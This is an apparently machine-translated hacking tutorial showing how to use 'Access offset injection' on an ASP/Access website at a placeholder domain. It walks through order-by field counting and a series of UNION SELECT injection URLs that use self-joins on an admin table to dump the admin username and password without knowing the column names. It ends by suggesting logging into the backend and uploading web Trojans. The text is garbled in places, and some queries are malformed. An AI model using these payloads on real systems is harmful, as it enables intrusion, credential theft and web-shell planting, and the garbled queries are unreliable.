Flexible use of Access injection points

This article is generally technical and mainly intended to bring you some ideas through the process. : P

Detect a website, build with Microsoft-IIS/5.0 and Asp + Access, and search for an SQL injection point http://www.test.com/detail.asp via Google? IssueID = 322.
After adding and 1 = 1 to the url, return normal, and 1 = 2 error ,:

The number of fields detected by order by is 17, and then scanned by pangolin to detect an adm table, which contains only the id field, so I changed the value of D, james and other injection tools have not been detected. Because it is an Access database, you can only rely on guesses. Most people will give up in these cases, but suddenly want to use Access offset injection. This technology does not need to know the specific field name and data burst. The procedure is as follows:

The number of fields is 17 and an adm table is known. Therefore, visit the following link to return to the normal page.
Http://www.test.com/detail.asp? IssueID =-322? Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 from adm

Then access
Http://www.test.com/detail.asp? IssueID = 322 Union select 1, * from adm,
Http://www.test.com/detail.asp? IssueID = 322 Union select 1, 2, * from adm,
Http://www.test.com/detail.asp? IssueID = 322 Union select 1, 2, 3, * from adm
Fields gradually increase until the page returns normal:
Http://www.test.com/detail.asp? IssueID = 322 Union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, * from adm
In this case, the number of fields is 14, 17-14 = 3, and the number of adm fields is 3. After the self-linked adm table is 2*3 = 6 fields, then we add 11 fields to add 17 fields, as shown below:
Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, * from (adm as a inner join adm as B on a. id = B. id)
Access address:
Http://www.test.com/detail.asp? IssueID = 322 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, * from (adm as a inner join adm as B on a. id = B. id)

Cliff is exposed, the user name is in the visual test, and the password continues to be cracked. After 11, add a. id. at this time, the user name is displayed, and then add B. id.
Http://www.test.com/detail.asp? IssueID = 322 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11,. id, B. id, * from (adm as a inner join adm as B on. id = B. id)

The corresponding position is 1. It should be the id field. Let's continue
Http://www.test.com/detail.asp? IssueID = 322 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11,. id, B. id, c. id, * from (adm as a inner join adm as B on. id = B. id) inner join adm as c on. id = c. id)
At this time, the password still does not pop up, a little depressing.

When I almost gave up, I suddenly thought that I could search for fields on the login page. So I went to the http://www.test.com/login.asp?source file and found loginand pswd.

Add them to the pangolin scan, and the user name cannot be scanned. It is estimated that the database is not this field, but a user name cliff is reported through the offset injection, and the id is 1, you can log on directly with the corresponding password.

The next thing is simple. You can log on to the background and upload web Trojans without any pressure.